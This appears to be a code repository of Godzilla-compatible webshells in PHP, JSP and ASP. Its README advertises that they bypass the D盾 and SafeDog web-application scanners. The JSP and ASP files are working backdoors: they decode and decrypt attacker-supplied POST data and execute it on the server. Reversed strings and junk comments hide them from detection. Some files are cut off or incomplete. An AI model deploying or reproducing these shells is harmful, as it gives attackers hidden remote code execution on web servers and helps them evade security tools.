├── README.md ├── err.php ├── godzilla_aes_base64.jsp ├── godzilla_xor_base64.asp └── godzilla_xor_base64.php /README.md: -------------------------------------------------------------------------------- 1 | # php_jsp_asp_webshell 2 | php webshell bypass D盾、safedog,仅支持php7 3 | 4 | jsp未过河马 5 | -------------------------------------------------------------------------------- /err.php: -------------------------------------------------------------------------------- 1 | <% 65 | if (request.getMethod().equals("POST") && abcd==abcd){ 66 | try{ 67 | byte[] data=base64Decode(request/*jjHnw`]}D`|PI\\7rv?EgvYYwC&9~P"]sh,?:0S&)wu>mQ\'?\'qzP{3*/ 68 | .getParameter(pass)); 69 | data= 70 | x(data, false); 71 | if (session 72 | .getAttribute(rs("daolyap"))==null){ 73 | ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader(); 74 | session 75 | .setAttribute(rs("daolyap"), new X(contextClassLoader).Q(data)); 76 | }else{/*T0+MdQ{piLt\\wkMzHIc2UxY'vm#Pm?_]1*/ 77 | request/*{(fEyp)RS>#yQCtQa;=UBv#h~J*/ 78 | .setAttribute(rs("sretemarap"),data); 79 | java.io.ByteArrayOutputStream ao= 80 | new java.io.ByteArrayOutputStream(); 81 | Object f=/*r=wnIo}DH3EV5d.y+:,g#L{m>pa}b-usUjpy9#95CliAW[NP602XxZ;@xo~v-K46r4\\'VbJ*/ 82 | ((Class)session.getAttribute(rs("daolyap")))/*Y7-!~&CI}pVO\\3LQdLRCWM2Obo\\*/ 83 | .newInstance(); 84 | if(abcd==114514){/*I"DO&{iM~c7|3Mo-7|9\'ft7)x3%=<_t-]d;F@,;\\K9a~W<1+\\W^*/ 93 | .toByteArray(), true))); 94 | response.getWriter().write(k.substring(16)); 95 | }} 96 | }catch (Exception e){}}%> -------------------------------------------------------------------------------- /godzilla_xor_base64.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Set bypassDictionary = Server.CreateObject("Scripting.Dictionary") 3 | Function rs(ips) 4 | Dim rss 5 | rss = "" 6 | For i = Len(ips) To 1 Step -1 7 | rss = rss & Mid(ips, i, 1) 8 | Next 9 | rs = rss 10 | End Function 11 | Function Base64Decode(ByVal vCode) 12 | Dim oXML, oNode 13 | Set oXML = CreateObject(rs("0.3.tnemucoDMOD.2lmxsM")) 14 | Set oNode = oXML.CreateElement(rs("46esab")) 15 | oNode.dataType = rs("46esab.nib") 16 | oNode.text = vCode 17 | Base64Decode = oNode.nodeTypedValue 18 | Set oNode = Nothing 19 | Set oXML = Nothing 20 | End Function 21 | Function decryption(content,isBin) 22 | dim size,i,result,keySize 23 | keySize = len(key) 24 | Set BinaryStream = CreateObject(rs("maertS.BDODA")) 25 | BinaryStream.CharSet = "iso-8859-1" 26 | BinaryStream.Type = 2 27 | BinaryStream.Open 28 | if IsArray(content) then 29 | size=UBound(content)+1 30 | For i=1 To size 31 | BinaryStream.WriteText chrw(ascb(midb(content,i,1)) Xor Asc(Mid(key,(i mod keySize)+1,1))) 32 | Next 33 | end if 34 | BinaryStream.Position = 0 35 | if isBin then 36 | BinaryStream.Type = 1 37 | decryption=BinaryStream.Read() 38 | else 39 | decryption=BinaryStream.ReadText() 40 | end if 41 | End Function 42 | key="32150285b345c48a" 43 | content=request.Form(rs("411drowssap")) 44 | if not IsEmpty(content) then 45 | 46 | if IsEmpty(Session(rs("daolyap"))) then 47 | content=decryption(Base64Decode(content),false) 48 | Session(rs("daolyap"))=content 49 | response.End 50 | else 51 | content=decryption(Base64Decode(content),true) 52 | bypassDictionary.Add rs("daolyap"),Session(rs("daolyap")) 53 | Execute(bypassDictionary(rs("daolyap"))) 54 | result=run(content) 55 | response.Write(rs("e6f65b")) 56 | if not IsEmpty(result) then 57 | response.Write Base64Encode(decryption(result,true)) 58 | end if 59 | response.Write(rs("bfb66d")) 60 | end if 61 | end if 62 | %> 63 | -------------------------------------------------------------------------------- /godzilla_xor_base64.php: -------------------------------------------------------------------------------- 1 |